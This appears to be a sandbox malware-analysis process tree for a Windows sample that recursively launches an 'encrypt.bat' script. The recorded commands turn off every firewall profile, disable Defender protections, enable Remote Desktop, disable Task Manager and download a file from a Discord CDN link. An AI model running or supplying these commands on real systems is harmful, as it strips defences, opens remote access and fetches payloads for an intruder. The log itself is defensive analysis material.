C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:2444
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable42⤵PID:1492
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE42⤵PID:3816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off42⤵PID:200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off42⤵PID:4976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off42⤵PID:1212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off42⤵PID:2680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off42⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"42⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"42⤵
- Blocklisted process makes network request
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"42⤵
- Modifies registry class
PID:3588
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"43⤵PID:1376
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"44⤵PID:132
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f44⤵PID:2808
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"44⤵PID:3404
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f44⤵PID:3952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:32
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵
- Command and Scripting Interpreter: PowerShell
PID:8
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable44⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE44⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off44⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off44⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off44⤵
- Modifies Windows Firewall
PID:4012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off44⤵PID:2912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off44⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"44⤵
- Command and Scripting Interpreter: PowerShell
PID:1572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:3768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"44⤵
- Blocklisted process makes network request
PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"44⤵
- Modifies registry class
PID:4812
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"45⤵PID:4284
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"46⤵PID:1432
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f46⤵PID:1108
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"46⤵PID:1976
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f46⤵PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:5032
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable46⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE46⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off46⤵PID:1492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off46⤵PID:1060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off46⤵PID:1736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off46⤵PID:3412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off46⤵PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"46⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:3644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"46⤵
- Blocklisted process makes network request
PID:1948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"46⤵
- Modifies registry class
PID:3980
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"47⤵PID:2072
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"48⤵PID:4064
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f48⤵PID:2248
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"48⤵PID:2328
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f48⤵PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:3092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable48⤵PID:200
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE48⤵PID:1216
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off48⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off48⤵PID:3192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off48⤵PID:3404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off48⤵PID:4444
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off48⤵PID:4204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"48⤵
- Command and Scripting Interpreter: PowerShell
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:1180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"48⤵
- Blocklisted process makes network request
PID:4636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"48⤵PID:2748
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"49⤵PID:236
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"50⤵PID:3952
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f50⤵PID:3276
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"50⤵PID:1084
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f50⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:3480
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable50⤵PID:200
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE50⤵PID:1948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off50⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off50⤵PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off50⤵PID:1704
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off50⤵PID:676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off50⤵PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"50⤵PID:132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"50⤵
- Blocklisted process makes network request
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"50⤵
- Modifies registry class
PID:1404 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"51⤵PID:4216
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"52⤵PID:2856
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f52⤵PID:4024
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"52⤵PID:4848
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f52⤵PID:1408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:1716
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable52⤵PID:1060
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE52⤵PID:4068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off52⤵PID:2956
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off52⤵PID:328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off52⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off52⤵
- Modifies Windows Firewall
PID:3192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off52⤵PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"52⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:32
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:3292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"52⤵
- Blocklisted process makes network request
PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"52⤵PID:1664
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE70⤵PID:4988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off70⤵
- Modifies Windows Firewall
PID:976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off70⤵PID:4524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off70⤵PID:1976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off70⤵PID:5048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off70⤵PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"70⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:2392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:3976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"70⤵
- Blocklisted process makes network request
PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"70⤵
- Modifies registry class
PID:2516 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"71⤵PID:5056
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"72⤵PID:3276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f72⤵PID:888
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"72⤵PID:4524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f72⤵PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:3264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable72⤵
- Modifies Windows Firewall
PID:1408
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE72⤵PID:2748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off72⤵PID:732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off72⤵
- Modifies Windows Firewall
PID:2912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off72⤵PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off72⤵PID:2600
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off72⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"72⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:3036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"72⤵
- Blocklisted process makes network request
PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"72⤵PID:132
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"73⤵PID:3412
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"74⤵PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f74⤵PID:2748
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"74⤵PID:2236
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f74⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"74⤵PID:1188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"74⤵PID:1180
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable74⤵PID:1444
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE74⤵PID:3932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off74⤵PID:3788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off74⤵PID:2340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off74⤵PID:2744
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off74⤵PID:1028
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off74⤵PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"74⤵PID:432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"74⤵PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"74⤵PID:4056
-
-
